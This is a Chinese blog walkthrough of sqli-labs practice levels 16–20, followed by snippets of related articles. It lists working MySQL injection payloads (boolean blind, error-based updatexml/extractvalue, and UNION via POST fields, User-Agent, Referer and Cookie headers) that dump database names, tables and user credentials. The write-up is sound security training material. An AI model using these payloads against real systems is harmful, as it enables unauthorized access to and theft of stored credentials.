sqli-labs(Less-16——Less-20)解题过程

最新推荐文章于 2024-08-08 14:51:00 发布
最新推荐文章于 2024-08-08 14:51:00 发布
阅读量692 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46204746/article/details/104341503
版权

Less-16
先尝试输入admn,显示登录成功,但是没有返回信息,又然后尝试输入:uname=admin") or 1=1#&passwd=admin&submit=Submit,回显成功,同样也没有返回信息,与15题的做法相同,使用盲注在这里插入图片描述
爆数据库名:uname=1") or (select ascii(substr(database(),1,1)) >110)#&passwd=admin&submit=Submit在这里插入图片描述

uname=1") or (select ascii(substr(database(),1,1)) >120)#&passwd=admin&submit=Submit
在这里插入图片描述
通过测试,得知数据库的第一个字母的ascii值大于110小于120,通过一步步测试可以得出第一个字母的值
爆表名:uname=1") or (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100)#&passwd=admin&submit=Submit
在这里插入图片描述
uname=1") or (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) >105)#&passwd=admin&submit=Submit
在这里插入图片描述
通过测试,得知当前数据库的表名的第一个字母的ascii值大于100小于105,通过一步步测试可以得出第一个字母的值,继而逐渐得到数据库中的表名
爆users表中的数据:uname=1") or (select ascii(substr((select username from users limit 0,1),1,1))>60)#&passwd=admin&submit=Submit
在这里插入图片描述
uname=1") or (select ascii(substr((select username from users limit 0,1),1,1))>70)#&passwd=admin&submit=Submit
在这里插入图片描述
通过测试,得到表users中的第一个用户名的第一个字母的ascii值大于60且小于70,逐渐测下去,可以得到所有数据

Less-17 (基于错误的_post_更新查询注入)
尝试注入:uname=123&passwd=123 or 1=1#&submit=Submit ,发现什么变化也没有
在这里插入图片描述
再仔细观察,发现了界面显示的内容PASSWORD RESET
在这里插入图片描述
尝试输入:uname=admin&passwd=abcd&submit=Submit,登录成功,查看数据库的数据,发现admin的密码改变了
在这里插入图片描述在这里插入图片描述
查看后台代码,发现了以下信息,Update 语句用于修改表中的数据。
在这里插入图片描述
显然这道题不好用username,这里没有对password进行过滤,可以对password进行注入
在这里插入图片描述
得到当前数据库的版本:uname=admin&passwd=admin’ and
updatexml(1,concat(0x7e,version(),0x7e),1)#&submit=Submit
在这里插入图片描述
报错注入:updatexml报错原理
格式:updatexml(xml_target, xpath_expr, new_xml);
xpath_expr: 需要更新的xml路径(Xpath格式的字符串)
new_xml:替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
Xpath格式是 /…/…/…,如果我们写入其他格式,就会报错,此时会返回我们写入的错误格式的内容,而这个错误内容就是我们要查询的内容。例如:
在这里插入图片描述
当前库名:uname=admin&passwd=admin’ and
updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit
在这里插入图片描述
爆出当前库中的表名:uname=admin&passwd=‘or
updatexml(1,concat(’~’,(select table_name from information_schema.tables where
table_schema=‘security’ limit 0,1),’~’),0)#&submit=Submit
在这里插入图片描述
只需修改limit的范围,就可爆出当前数据库中的所有表名
uname=admin&passwd=‘or
updatexml(1,concat(’~’,(select table_name from information_schema.tables where table_schema=‘security’ limit 3,1),’~’),0)#&submit=Submit
在这里插入图片描述
获取当前表中的部分字段名:uname=admin&passwd=‘or
updatexml(1,concat(’~’,(select column_name from information_schema.columns
where table_name=‘users’ limit 4,1),’~’),0)#&submit=Submit
在这里插入图片描述
获取字段中的数据:uname=admin&passwd=’ or updatexml(1,concat(’~’,(select * from(select concat_ws(char(45),id,username,password) from users limit 7,1)as a),’~’),0)#&submit=Submit

在这里插入图片描述
Less-18 (基于错误的_post_用户代理_头部注入)
此题为user-agent型注入,需要打开burp suite进行抓包,对user-agent进行修改获取信息
在这里插入图片描述
报错注入:extractvalue报错原理

语法:extractvalue(目标xml文档,xml路径)
xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,与updatexml一样,如果路径格式输入错误,就会产生报错,也会输出我们想要的内容,例如:
在这里插入图片描述
User-Agent改为:'or extractvalue(1,concat(0x7e,(select database()),0x7e)) or ’
爆当前所在库名
在这里插入图片描述
User-Agent改为: ‘or extractvalue(1,concat(0x7e,(select
group_concat(table_name) from information_schema.tables where
table_schema=database()),0x7e)) or ’
爆出当前库中所有的表名
在这里插入图片描述
User-Agent改为:’ or extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name=‘users’),0x7e)) or ’
获得users表中的部分字段名在这里插入图片描述
User-Agent改为: 'or extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name=‘users’ and column_name not
in(‘user’,‘current_connections’,‘total_connections’)),0x7e)) or ’
获得uses表中剩下的字段名

在这里插入图片描述
User-Agent改为:‘or
extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e)) or ’
获得字段中的部分数据
在这里插入图片描述
同样使用not in()得到剩下是数据,因为错误信息只显示一部分,同样也可以使用limit偏移注入
User-Agent改为:’ or updatexml(1,concat(’#’,(select * from (select
concat_ws(’#’,id,username,password) from users limit 0,1) a)),0),’’,’’)#
得到字段的部分数据,然后只需要修改limit的范围,就可一步步获得所有数据
在这里插入图片描述
User-Agent改为:’ or updatexml(1,concat(’#’,(select * from (select
concat_ws(’#’,id,username,password) from users limit 7,1) a)),0),’’,’’)#
在这里插入图片描述
Less-19 (基于错误_POST_Referer_请求头注入
输入admin,登录成功后回显的是Referer而不是User-Agent,判断是referer型注入,首先打开burp suite进行抓包,前面的步骤与上一题相同
Referer改为: ’ or updatexml(1,concat(’~’,(database())),0),’’)#
爆出当前数据库名
在这里插入图片描述
Referer改为: ’ or updatexml(1,concat(’~’,(select group_concat(table_name) from
information_schema.tables where table_schema=‘security’)),0),’’)#
爆出当前数据库中的表名
在这里插入图片描述
Referer改为: ’ or updatexml(1,concat(’~’,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and
table_name=‘users’)),0),’’)#
获得users表中的字段名
在这里插入图片描述
Referer改为: ’ or updatexml(1,concat(’~’,(select * from (select
concat_ws(’~’,id,username,password) from users limit 0,1) a)),0),’’)#
通过改limit的范围,逐步获得字段中的数据
在这里插入图片描述
Less-20
此题是基于cookie的注入,输入admin,回显登录成功,但无回显数据,打开burp suite抓包,把POST改为GET,加入cookie,,发给Repeater,然后开始注入
在这里插入图片描述在这里插入图片描述在这里插入图片描述
查看列数,得到共3列
Cookie:uname=admin’ order by 3 #
在这里插入图片描述
Cookie:uname=admin’ order by 4 #
在这里插入图片描述
爆出所有数据库名:Cookie:uname=-1’ union select
1,1,(select group_concat(schema_name) from information_schema.schemata)#
在这里插入图片描述
爆出当前数据库中的所有表名:Cookie:uname=-1’ union select
1,1,(select group_concat(table_name) from information_schema.tables where
table_schema=“security” ) #
在这里插入图片描述
爆出当前表中的所有字段名:Cookie:uname=-1’ union select
1,1,(select group_concat(column_name) from information_schema.columns where table_name=“users” ) #
在这里插入图片描述
爆出表中的所有信息:Cookie:uname=-1’ union select
1,1,(select group_concat(username,password) from security.users ) #
在这里插入图片描述
这道题不知道为什么登录成功后无法看到回显信息,在burp抓的包里也没有显示cookie这一行,在网上查解决办法也没有看到,然后想既然burp可以修改,就尝试在burp里进行添加再发给Repeater进行加载,结果居然成功了,震惊!!!虽然现在也不知道为什么不回显信息。。。

发际线预备队
关注
sqli-labs less-15 & less-16
water0diamond的博客
03-17 644
POST-Blind-Boolian/time Based-Single quotes (基于bool/时间的单引号POST型盲注) Less-15 POST-Blind-Boolian/Time Based-Double quotes (基于bool/时间的双引号POST型盲注) Less-16 我们可以看到随便输入用户名和密码不会有任何返回 试过很多发现,无论是随便乱输密...
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
m0_54899775的博客
12-30 1893
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
sqli-labs (less-16)
kukudeshuo的博客
03-11 695
sqli-labs (less-16) 进入16关,输入用户名和密码,可以看到没有数据回显 输入 uname=admin'&passwd=admin&submit=Submit #没有错误回显 uname=admin"&passwd=admin&submit=Submit #没有错误回显 没有错误回显,我们只能一个一个去猜闭合方式,利用时间盲注去判断注入点 uname=admin' and sleep(5)#&passwd=admin&submit=Su
SQL注入实例(sqli-labs/less-16
最新发布
Thewei666的博客
08-08 433
使用python脚本,查询后续的内容修改concat的范围就行。python脚本爆库名。使用python脚本。使用python脚本。
sqli labs less 16
Xiaoxiaoqiang_的博客
03-02 224
sql注入
sqli-labs/Less-16
m0_71299382的博客
11-18 282
sqli-labs第十六关
sqli-labs (less-20)
kukudeshuo的博客
03-11 331
sqli-labs (less-20) 进入20关,输入用户名和密码后,屏幕回显了我们的USER AGENT、IP地址、cookie信息 通过回显的为cookie信息我们猜测这关注入点很有可能在cookie里,题目提示也告诉我们为cookie注入 这里我们利用火狐的一个小工具来抓取cookie的信息,这个工具的名字为Cookies Manager +,我们打开来查看当前页面的cookie信息 我们输入’试试 屏幕回显报错 根据报错信息判断闭合方式为’#,并且为字符型注入 判断字段长度 判断字段
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 1864
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
sqli-labs Less-5解题思路
qq_35266419的博客
05-12 684
从本节开始就学习盲注,思路较 Less1-4略有不同,请仔细体会 Less-5 Get-Double injection-Single Quotes - String (1)查看页面源代码 通过页面源代码,什么都不显示 (2)猜测数据库的长度 当数据库长度正确和错误时,如上图所示 (3)现在开始猜测数据库第一位(其实盲注和前面几个的解题思路一样,只是手法稍有不同) (4)猜测数据库名称第二...
Sqli-labs靶场详细攻略Less 34-37
qq_41755084的博客
10-31 1051
这一关还是进行宽字节注入,与上一关的区别在于使用了post方法进行传递。先试一下上一关的注入代码。因为这一关是登录,就使用之前的dumb账号。登陆失败了,也没报错,看一下这个包传递时post方法里参数是咋传的。可以看到,我们输入的注入代码在前端被进行了一个url编码,%被编码成了%25,原来的空格被替换成了+,原来的+被替换成了%2b那我们再把这个包改回来就好,+不用改回空格,在服务端会改回来的。并且经过尝试,这里的列数为2。注入成功。
Sqli-labs-master超详细通关教程(1-23关基础篇)
m0_67391270的博客
06-12 3374
一到四关主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sqli-labs/Less-20
m0_71299382的博客
11-18 257
sqli-labs第二十关
sqli-lab-less16
Sa1nZen的博客
08-03 120
sqli-lab-less16
sqli-labs Less-16
qq_42630215的博客
04-01 250
Less-16 POST -Blind -Boolian/Time Based -Double quotes Less-16和Less-15关都是盲注,在构造payload的时候只需要把’替换为")就可以了。 0x01. 查询语句: uname=1&passwd=1 or 1=1# uname=1&passwd=1’ or 1=1# uname=1&passwd=1” or...
sqli-labs:less-16
羽的博客
08-29 211
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
SQLi LABS Less 16 布尔盲注
热门推荐
wangyuxiang946的博客
08-14 1万+
SQLi 第十六关,SQLi-LABS Less-16SQLi-LABS Less 16SQLiLABS Less16SQLi Less 16
sqli-labs:less-20
羽的博客
09-10 204
回显了很多http头。 注入点应该就是cookie头 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-...
sqli-labs————less 20
Fly_鹏程万里
05-12 1684
Less-20这里做一个简单的测试:username:adminpassword:aaa从上面的显示结果中,我们看到了user-agent、COOKIE的内容,我们这里查看一下源代码看看,到底是怎么回事:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD...
sqli-labs (less15-less16)
Xi4or0uji
07-31 1067
less 15 post方法单引号时间盲注 这关跟之前的get方法的盲注差不多,具体就不多解释了,因为后台的查询语句是select xxx from "table_name" where uname='$_POST["uname"]' and passwd='$_POST["passwd"]' 所以只要构造uname=admin'绕过就行了 贴个爆数据库的脚本,其他的改下sql语句就能用了...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值